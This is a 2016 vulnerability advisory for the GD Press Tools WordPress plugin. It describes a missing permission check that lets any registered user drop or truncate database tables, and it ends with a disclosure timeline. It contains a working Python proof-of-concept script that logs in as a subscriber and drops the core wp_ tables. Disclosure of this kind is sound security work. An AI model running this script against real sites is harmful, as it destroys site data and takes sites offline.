GD Press Tools [DoS]
GD Press Tools plugin for WordPress suffers from an Denial of Service vulnerability.
Description
GD Press Tools plugin for WordPress suffers from an Denial of Service vulnerability.
Plugin hooks a function to admin_init WordPress action which in turn executes the method gdPTAdmin::init_operations(). This method doesn’t check user rights before executing a list of predefined actions. One of those actions is the deletion of database tables.
Any registered user can execute this action in order to delete or truncate database tables, no specific privileges are required for the attacker. This can cause the entire website to go down, therefor this is considered a Denial of Service vulnerability.
PoC
The following script will delete most core tables from database. We assume that the tables prefix is wp, a common scenario as this is the default prefix.
#!/usr/bin/python3
################################################################################
# GD Press Tools - Denial of Service
#
# !!! WARNING !!! Don't use this in a production site, if successful it will
# delete most of your sites content and leave it in an unusable state
#
# Author: Pan Vag <[email protected]>
################################################################################
import requests
baseUrl = 'http://example.com'
loginUrl = baseUrl + '/wp-login.php'
adminUrl = baseUrl + '/wp-admin/index.php'
loginPostData = {
'log': 'subscriber',
'pwd': 'password',
'rememberme': 'forever',
'wp-submit': 'Log+In'
}
s = requests.Session()
r = s.post(loginUrl, loginPostData)
if r.status_code != 200:
print('Login error')
exit(1)
tables = [
'wp_postmeta',
'wp_commentmeta',
'wp_termmeta',
'wp_term_relationships',
'wp_term_taxonomy',
'wp_comments',
'wp_links',
'wp_terms',
'wp_posts',
'wp_options',
]
for name in tables:
print('Attempting to drop table ' + name)
r = s.get(adminUrl, params={
# The action `tblemp` uses TRUNCATE to empty the table instead of drop it
'gda': 'tpldrp',
'name': name
})
if r.status_code != 200:
print('Attempt to drop table ' + name + ' failed')
exit(0)
Solution
As of 2016-02-18 vendor stated that this plugin is discontinued and won’t resolve this issue. The only available solution is to remove this plugin.
- 17 February 2016
- Pan Vag
- www.dev4press.com
- wordpress.org
- WordPress 4.4.2
- DWF-2016-87003
- 2016-02-17:
Vendor notified through wordpress.org support forums - 2016-02-18:
Vendor notified through contact form in his website - 2016-02-17:
Author responded won't fix - 2016-02-18:
Notified security at wordpress.org and plugins at wordpress.org - 2016-02-23:
Plugin was taken down by wordpress.org plugins team